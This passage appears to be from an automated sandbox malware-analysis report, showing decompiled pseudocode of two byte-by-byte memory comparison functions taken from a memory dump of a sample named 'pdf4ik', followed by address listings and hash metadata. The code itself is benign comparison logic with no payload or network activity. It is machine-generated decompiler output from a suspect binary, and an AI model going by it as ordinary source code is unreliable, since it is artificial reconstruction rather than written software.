											L65:
											_t300 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t300 == 0) {
												L67:
												_t284 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t284 != 0) {
													_t157 = (0 | _t284 > 0x00000000) - 1; // -1
													_t284 = (_t284 > 0) + _t157;
												}
												goto L70;
											}
											_t151 = (0 | _t300 > 0x00000000) - 1; // -1
											_t284 = (_t300 > 0) + _t151;
											if(_t284 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t145 = (0 | _t298 > 0x00000000) - 1; // -1
										_t284 = (_t298 > 0) + _t145;
										if(_t284 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t139 = (0 | _t296 > 0x00000000) - 1; // -1
									_t284 = (_t296 > 0) + _t139;
									if(_t284 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t303 = (_t203 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t303 == 0) {
									L52:
									_t305 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t305 == 0) {
										L54:
										_t307 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t307 == 0) {
											L56:
											_t284 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t284 != 0) {
												_t131 = (0 | _t284 > 0x00000000) - 1; // -1
												_t284 = (_t284 > 0) + _t131;
											}
											goto L59;
										}
										_t125 = (0 | _t307 > 0x00000000) - 1; // -1
										_t284 = (_t307 > 0) + _t125;
										if(_t284 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t119 = (0 | _t305 > 0x00000000) - 1; // -1
									_t284 = (_t305 > 0) + _t119;
									if(_t284 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t113 = (0 | _t303 > 0x00000000) - 1; // -1
								_t284 = (_t303 > 0) + _t113;
								if(_t284 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t310 = (_t202 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t284 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t284 != 0) {
											_t106 = (0 | _t284 > 0x00000000) - 1; // -1
											_t284 = (_t284 > 0) + _t106;
										}
										goto L48;
									}
									_t100 = (0 | _t314 > 0x00000000) - 1; // -1
									_t284 = (_t314 > 0) + _t100;
									if(_t284 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t94 = (0 | _t312 > 0x00000000) - 1; // -1
								_t284 = (_t312 > 0) + _t94;
								if(_t284 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t88 = (0 | _t310 > 0x00000000) - 1; // -1
							_t284 = (_t310 > 0) + _t88;
							if(_t284 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t317 = (_t201 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t317 == 0) {
							L30:
							_t319 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t319 == 0) {
								L32:
								_t321 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t321 == 0) {
									L34:
									_t284 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t284 != 0) {
										_t81 = (0 | _t284 > 0x00000000) - 1; // -1
										_t284 = (_t284 > 0) + _t81;
									}
									goto L37;
								}
								_t75 = (0 | _t321 > 0x00000000) - 1; // -1
								_t284 = (_t321 > 0) + _t75;
								if(_t284 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t69 = (0 | _t319 > 0x00000000) - 1; // -1
							_t284 = (_t319 > 0) + _t69;
							if(_t284 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t63 = (0 | _t317 > 0x00000000) - 1; // -1
						_t284 = (_t317 > 0) + _t63;
						if(_t284 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t324 = (_t200 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t324 == 0) {
						L19:
						_t326 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t326 == 0) {
							L21:
							_t328 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t328 == 0) {
								L23:
								_t284 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t284 != 0) {
									_t56 = (0 | _t284 > 0x00000000) - 1; // -1
									_t284 = (_t284 > 0) + _t56;
								}
								goto L26;
							}
							_t50 = (0 | _t328 > 0x00000000) - 1; // -1
							_t284 = (_t328 > 0) + _t50;
							if(_t284 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t44 = (0 | _t326 > 0x00000000) - 1; // -1
						_t284 = (_t326 > 0) + _t44;
						if(_t284 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t38 = (0 | _t324 > 0x00000000) - 1; // -1
					_t284 = (_t324 > 0) + _t38;
					if(_t284 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t31 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t31;
								}
								goto L15;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t25 = __edx - 1; // -1
							__esi = __edx + _t25;
							if(__edx + _t25 != 0) {
								goto L1;
							}
							goto L12;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t19 = __edx - 1; // -1
						__esi = __edx + _t19;
						if(__edx + _t19 != 0) {
							goto L1;
						}
						goto L10;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t13 = __edx - 1; // -1
					__esi = __edx + _t13;
					if(__edx + _t13 != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t284;
				goto L3;
			}
































                                        0x29dba81a
                                        0x29dba81a
                                        0x29dba820
                                        0x29dba897
                                        0x29dba899
                                        0x29dba89b
                                        0x00000000
                                        0x00000000
                                        0x29dba8a1
                                        0x29dba8a7
                                        0x29dba91e
                                        0x29dba920
                                        0x29dba922
                                        0x00000000
                                        0x00000000
                                        0x29dba928
                                        0x29dba92e
                                        0x29dba9a5
                                        0x29dba9a7
                                        0x29dba9a9
                                        0x00000000
                                        0x00000000
                                        0x29dba9af
                                        0x29dba9b5
                                        0x29dbaa2c
                                        0x29dbaa2e
                                        0x29dbaa30
                                        0x00000000
                                        0x00000000
                                        0x29dbaa36
                                        0x29dbaa3c
                                        0x29dbaab3
                                        0x29dbaab5
                                        0x29dbaab7
                                        0x00000000
                                        0x00000000
                                        0x29dbaac3
                                        0x29dbab3b
                                        0x29dbab3d
                                        0x29dbab3f
                                        0x00000000
                                        0x00000000
                                        0x29dbab45
                                        0x29dbab4b
                                        0x29dbabc2
                                        0x29dbabc4
                                        0x29dbabc6
                                        0x00000000
                                        0x00000000
                                        0x29dbabd4
                                        0x29dba440
                                        0x29dba442
                                        0x29dbb0e6
                                        0x29dbb0e6
                                        0x29dbabe2
                                        0x29dbabe4
                                        0x29dba7fa
                                        0x29dba802
                                        0x29dba804
                                        0x29dba811
                                        0x29dba811
                                        0x29dba811
                                        0x00000000
                                        0x29dba804
                                        0x29dbabf1
                                        0x29dbabf7
                                        0x29dbafd8
                                        0x00000000
                                        0x29dbafd8
                                        0x00000000
                                        0x29dbabfd
                                        0x29dbab54
                                        0x29dbab56
                                        0x29dbab6b
                                        0x29dbab73
                                        0x29dbab75
                                        0x29dbab8a
                                        0x29dbab92
                                        0x29dbab94
                                        0x29dbaba9
                                        0x29dbabb1
                                        0x29dbabb3
                                        0x29dbabbc
                                        0x29dbabbc
                                        0x29dbabbc
                                        0x00000000
                                        0x29dbabb3
                                        0x29dbab9d
                                        0x29dbab9d
                                        0x29dbaba3
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaba3
                                        0x29dbab7e
                                        0x29dbab7e
                                        0x29dbab84
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbab84
                                        0x29dbab5f
                                        0x29dbab5f
                                        0x29dbab65
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbab65
                                        0x29dbaacd
                                        0x29dbaacf
                                        0x29dbaae4
                                        0x29dbaaec
                                        0x29dbaaee
                                        0x29dbab03
                                        0x29dbab0b
                                        0x29dbab0d
                                        0x29dbab22
                                        0x29dbab2a
                                        0x29dbab2c
                                        0x29dbab35
                                        0x29dbab35
                                        0x29dbab35
                                        0x00000000
                                        0x29dbab2c
                                        0x29dbab16
                                        0x29dbab16
                                        0x29dbab1c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbab1c
                                        0x29dbaaf7
                                        0x29dbaaf7
                                        0x29dbaafd
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaafd
                                        0x29dbaad8
                                        0x29dbaad8
                                        0x29dbaade
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaade
                                        0x29dbaa45
                                        0x29dbaa47
                                        0x29dbaa5c
                                        0x29dbaa64
                                        0x29dbaa66
                                        0x29dbaa7b
                                        0x29dbaa83
                                        0x29dbaa85
                                        0x29dbaa9a
                                        0x29dbaaa2
                                        0x29dbaaa4
                                        0x29dbaaad
                                        0x29dbaaad
                                        0x29dbaaad
                                        0x00000000
                                        0x29dbaaa4
                                        0x29dbaa8e
                                        0x29dbaa8e
                                        0x29dbaa94
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaa94
                                        0x29dbaa6f
                                        0x29dbaa6f
                                        0x29dbaa75
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaa75
                                        0x29dbaa50
                                        0x29dbaa50
                                        0x29dbaa56
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaa56
                                        0x29dba9be
                                        0x29dba9c0
                                        0x29dba9d5
                                        0x29dba9dd
                                        0x29dba9df
                                        0x29dba9f4
                                        0x29dba9fc
                                        0x29dba9fe
                                        0x29dbaa13
                                        0x29dbaa1b
                                        0x29dbaa1d
                                        0x29dbaa26
                                        0x29dbaa26
                                        0x29dbaa26
                                        0x00000000
                                        0x29dbaa1d
                                        0x29dbaa07
                                        0x29dbaa07
                                        0x29dbaa0d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dbaa0d
                                        0x29dba9e8
                                        0x29dba9e8
                                        0x29dba9ee
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba9ee
                                        0x29dba9c9
                                        0x29dba9c9
                                        0x29dba9cf
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba9cf
                                        0x29dba937
                                        0x29dba939
                                        0x29dba94e
                                        0x29dba956
                                        0x29dba958
                                        0x29dba96d
                                        0x29dba975
                                        0x29dba977
                                        0x29dba98c
                                        0x29dba994
                                        0x29dba996
                                        0x29dba99f
                                        0x29dba99f
                                        0x29dba99f
                                        0x00000000
                                        0x29dba996
                                        0x29dba980
                                        0x29dba980
                                        0x29dba986
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba986
                                        0x29dba961
                                        0x29dba961
                                        0x29dba967
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba967
                                        0x29dba942
                                        0x29dba942
                                        0x29dba948
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba948
                                        0x29dba8b0
                                        0x29dba8b2
                                        0x29dba8c7
                                        0x29dba8cf
                                        0x29dba8d1
                                        0x29dba8e6
                                        0x29dba8ee
                                        0x29dba8f0
                                        0x29dba905
                                        0x29dba90d
                                        0x29dba90f
                                        0x29dba918
                                        0x29dba918
                                        0x29dba918
                                        0x00000000
                                        0x29dba90f
                                        0x29dba8f9
                                        0x29dba8f9
                                        0x29dba8ff
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba8ff
                                        0x29dba8da
                                        0x29dba8da
                                        0x29dba8e0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba8e0
                                        0x29dba8bb
                                        0x29dba8bb
                                        0x29dba8c1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba822
                                        0x29dba822
                                        0x29dba825
                                        0x29dba829
                                        0x29dba82b
                                        0x29dba840
                                        0x29dba840
                                        0x29dba844
                                        0x29dba848
                                        0x29dba84a
                                        0x29dba85f
                                        0x29dba85f
                                        0x29dba863
                                        0x29dba867
                                        0x29dba869
                                        0x29dba87e
                                        0x29dba87e
                                        0x29dba882
                                        0x29dba886
                                        0x29dba888
                                        0x29dba88a
                                        0x29dba891
                                        0x29dba891
                                        0x29dba891
                                        0x00000000
                                        0x29dba888
                                        0x29dba86b
                                        0x29dba86f
                                        0x29dba872
                                        0x29dba872
                                        0x29dba878
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba878
                                        0x29dba84c
                                        0x29dba850
                                        0x29dba853
                                        0x29dba853
                                        0x29dba859
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba859
                                        0x29dba82d
                                        0x29dba831
                                        0x29dba834
                                        0x29dba834
                                        0x29dba83a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba83a
                                        0x29dba0a3
                                        0x29dba0a3
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction ID: a31962c88d749db111f1b8da4516c12b95a7eade15df23135d68090a18841976
                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                        • Instruction Fuzzy Hash: 47C18173D1E5B309872A452D453832FFFE26E81A4071BC39ADDD53F98AC6276E02A5D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DBA448 Relevance: .3, Instructions: 332COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29DBA448(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t197;
				signed int _t271;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t309;
				void* _t311;
				void* _t313;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t271 = 0;
					L12:
					if(_t271 != 0) {
						goto L1;
					}
					_t192 =  *(_t183 - 0x19);
					if(_t192 ==  *(_t187 - 0x19)) {
						_t271 = 0;
						L23:
						if(_t271 != 0) {
							goto L1;
						}
						_t193 =  *(_t183 - 0x15);
						if(_t193 ==  *(_t187 - 0x15)) {
							_t271 = 0;
							L34:
							if(_t271 != 0) {
								goto L1;
							}
							_t194 =  *(_t183 - 0x11);
							if(_t194 ==  *(_t187 - 0x11)) {
								_t271 = 0;
								L45:
								if(_t271 != 0) {
									goto L1;
								}
								_t195 =  *(_t183 - 0xd);
								if(_t195 ==  *(_t187 - 0xd)) {
									_t271 = 0;
									L56:
									if(_t271 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t271 = 0;
										L67:
										if(_t271 != 0) {
											goto L1;
										}
										_t197 =  *(_t183 - 5);
										if(_t197 ==  *(_t187 - 5)) {
											_t271 = 0;
											L78:
											if(_t271 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t182 = (0 | _t184 > 0x00000000) - 1; // -1
												_t184 = (_t184 > 0) + _t182;
											}
											L2:
											return _t184;
										}
										_t274 = (_t197 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t274 == 0) {
											L71:
											_t276 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t276 == 0) {
												L73:
												_t278 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t278 == 0) {
													L75:
													_t271 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t271 != 0) {
														_t176 = (0 | _t271 > 0x00000000) - 1; // -1
														_t271 = (_t271 > 0) + _t176;
													}
													goto L78;
												}
												_t170 = (0 | _t278 > 0x00000000) - 1; // -1
												_t271 = (_t278 > 0) + _t170;
												if(_t271 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t164 = (0 | _t276 > 0x00000000) - 1; // -1
											_t271 = (_t276 > 0) + _t164;
											if(_t271 != 0) {
												goto L1;
											}
											goto L73;
										}
										_t158 = (0 | _t274 > 0x00000000) - 1; // -1
										_t271 = (_t274 > 0) + _t158;
										if(_t271 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t281 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t281 == 0) {
										L60:
										_t283 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t283 == 0) {
											L62:
											_t285 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t285 == 0) {
												L64:
												_t271 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t271 != 0) {
													_t151 = (0 | _t271 > 0x00000000) - 1; // -1
													_t271 = (_t271 > 0) + _t151;
												}
												goto L67;
											}
											_t145 = (0 | _t285 > 0x00000000) - 1; // -1
											_t271 = (_t285 > 0) + _t145;
											if(_t271 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t139 = (0 | _t283 > 0x00000000) - 1; // -1
										_t271 = (_t283 > 0) + _t139;
										if(_t271 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t133 = (0 | _t281 > 0x00000000) - 1; // -1
									_t271 = (_t281 > 0) + _t133;
									if(_t271 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t288 = (_t195 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t288 == 0) {
									L49:
									_t290 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t290 == 0) {
										L51:
										_t292 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t292 == 0) {
											L53:
											_t271 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t271 != 0) {
												_t125 = (0 | _t271 > 0x00000000) - 1; // -1
												_t271 = (_t271 > 0) + _t125;
											}
											goto L56;
										}
										_t119 = (0 | _t292 > 0x00000000) - 1; // -1
										_t271 = (_t292 > 0) + _t119;
										if(_t271 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t113 = (0 | _t290 > 0x00000000) - 1; // -1
									_t271 = (_t290 > 0) + _t113;
									if(_t271 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t107 = (0 | _t288 > 0x00000000) - 1; // -1
								_t271 = (_t288 > 0) + _t107;
								if(_t271 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t295 = (_t194 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t295 == 0) {
								L38:
								_t297 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t297 == 0) {
									L40:
									_t299 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t299 == 0) {
										L42:
										_t271 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t271 != 0) {
											_t100 = (0 | _t271 > 0x00000000) - 1; // -1
											_t271 = (_t271 > 0) + _t100;
										}
										goto L45;
									}
									_t94 = (0 | _t299 > 0x00000000) - 1; // -1
									_t271 = (_t299 > 0) + _t94;
									if(_t271 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t88 = (0 | _t297 > 0x00000000) - 1; // -1
								_t271 = (_t297 > 0) + _t88;
								if(_t271 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t82 = (0 | _t295 > 0x00000000) - 1; // -1
							_t271 = (_t295 > 0) + _t82;
							if(_t271 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t302 = (_t193 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L27:
							_t304 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L29:
								_t306 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L31:
									_t271 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t271 != 0) {
										_t75 = (0 | _t271 > 0x00000000) - 1; // -1
										_t271 = (_t271 > 0) + _t75;
									}
									goto L34;
								}
								_t69 = (0 | _t306 > 0x00000000) - 1; // -1
								_t271 = (_t306 > 0) + _t69;
								if(_t271 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t63 = (0 | _t304 > 0x00000000) - 1; // -1
							_t271 = (_t304 > 0) + _t63;
							if(_t271 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t57 = (0 | _t302 > 0x00000000) - 1; // -1
						_t271 = (_t302 > 0) + _t57;
						if(_t271 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t309 = (_t192 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t309 == 0) {
						L16:
						_t311 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t311 == 0) {
							L18:
							_t313 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t313 == 0) {
								L20:
								_t271 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t271 != 0) {
									_t50 = (0 | _t271 > 0x00000000) - 1; // -1
									_t271 = (_t271 > 0) + _t50;
								}
								goto L23;
							}
							_t44 = (0 | _t313 > 0x00000000) - 1; // -1
							_t271 = (_t313 > 0) + _t44;
							if(_t271 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t38 = (0 | _t311 > 0x00000000) - 1; // -1
						_t271 = (_t311 > 0) + _t38;
						if(_t271 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t32 = (0 | _t309 > 0x00000000) - 1; // -1
					_t271 = (_t309 > 0) + _t32;
					if(_t271 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									__edx = 0;
									_t25 = (0 | __esi > 0x00000000) - 1; // -1
									__esi = (__esi > 0) + _t25;
								}
								goto L12;
							}
							__edx = 0;
							__edx = 0 | __esi > 0x00000000;
							_t19 = __edx - 1; // -1
							__esi = __edx + _t19;
							if(__edx + _t19 != 0) {
								goto L1;
							}
							goto L9;
						}
						__edx = 0;
						__edx = 0 | __esi > 0x00000000;
						_t13 = __edx - 1; // -1
						__esi = __edx + _t13;
						if(__edx + _t13 != 0) {
							goto L1;
						}
						goto L7;
					}
					__edx = 0;
					__edx = 0 | __esi > 0x00000000;
					_t7 = __edx - 1; // -1
					__esi = __edx + _t7;
					if(__edx + _t7 != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t271;
				goto L2;
			}






























                                        0x29dba448
                                        0x29dba448
                                        0x29dba44e
                                        0x29dba4c5
                                        0x29dba4c7
                                        0x29dba4c9
                                        0x00000000
                                        0x00000000
                                        0x29dba4cf
                                        0x29dba4d5
                                        0x29dba54c
                                        0x29dba54e
                                        0x29dba550
                                        0x00000000
                                        0x00000000
                                        0x29dba556
                                        0x29dba55c
                                        0x29dba5d3
                                        0x29dba5d5
                                        0x29dba5d7
                                        0x00000000
                                        0x00000000
                                        0x29dba5dd
                                        0x29dba5e3
                                        0x29dba65a
                                        0x29dba65c
                                        0x29dba65e
                                        0x00000000
                                        0x00000000
                                        0x29dba664
                                        0x29dba66a
                                        0x29dba6e1
                                        0x29dba6e3
                                        0x29dba6e5
                                        0x00000000
                                        0x00000000
                                        0x29dba6f1
                                        0x29dba769
                                        0x29dba76b
                                        0x29dba76d
                                        0x00000000
                                        0x00000000
                                        0x29dba773
                                        0x29dba779
                                        0x29dba7f0
                                        0x29dba7f2
                                        0x29dba7f4
                                        0x00000000
                                        0x00000000
                                        0x29dba802
                                        0x29dba804
                                        0x29dba811
                                        0x29dba811
                                        0x29dba811
                                        0x29dba442
                                        0x29dbb0e6
                                        0x29dbb0e6
                                        0x29dba782
                                        0x29dba784
                                        0x29dba799
                                        0x29dba7a1
                                        0x29dba7a3
                                        0x29dba7b8
                                        0x29dba7c0
                                        0x29dba7c2
                                        0x29dba7d7
                                        0x29dba7df
                                        0x29dba7e1
                                        0x29dba7ea
                                        0x29dba7ea
                                        0x29dba7ea
                                        0x00000000
                                        0x29dba7e1
                                        0x29dba7cb
                                        0x29dba7cb
                                        0x29dba7d1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba7d1
                                        0x29dba7ac
                                        0x29dba7ac
                                        0x29dba7b2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba7b2
                                        0x29dba78d
                                        0x29dba78d
                                        0x29dba793
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba793
                                        0x29dba6fb
                                        0x29dba6fd
                                        0x29dba712
                                        0x29dba71a
                                        0x29dba71c
                                        0x29dba731
                                        0x29dba739
                                        0x29dba73b
                                        0x29dba750
                                        0x29dba758
                                        0x29dba75a
                                        0x29dba763
                                        0x29dba763
                                        0x29dba763
                                        0x00000000
                                        0x29dba75a
                                        0x29dba744
                                        0x29dba744
                                        0x29dba74a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba74a
                                        0x29dba725
                                        0x29dba725
                                        0x29dba72b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba72b
                                        0x29dba706
                                        0x29dba706
                                        0x29dba70c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba70c
                                        0x29dba673
                                        0x29dba675
                                        0x29dba68a
                                        0x29dba692
                                        0x29dba694
                                        0x29dba6a9
                                        0x29dba6b1
                                        0x29dba6b3
                                        0x29dba6c8
                                        0x29dba6d0
                                        0x29dba6d2
                                        0x29dba6db
                                        0x29dba6db
                                        0x29dba6db
                                        0x00000000
                                        0x29dba6d2
                                        0x29dba6bc
                                        0x29dba6bc
                                        0x29dba6c2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dba6c2
                                        0x29dba69d
                                        0x29dba69d
                                        0x29dba6a3
                                        0x00000000
                                        0x00000000
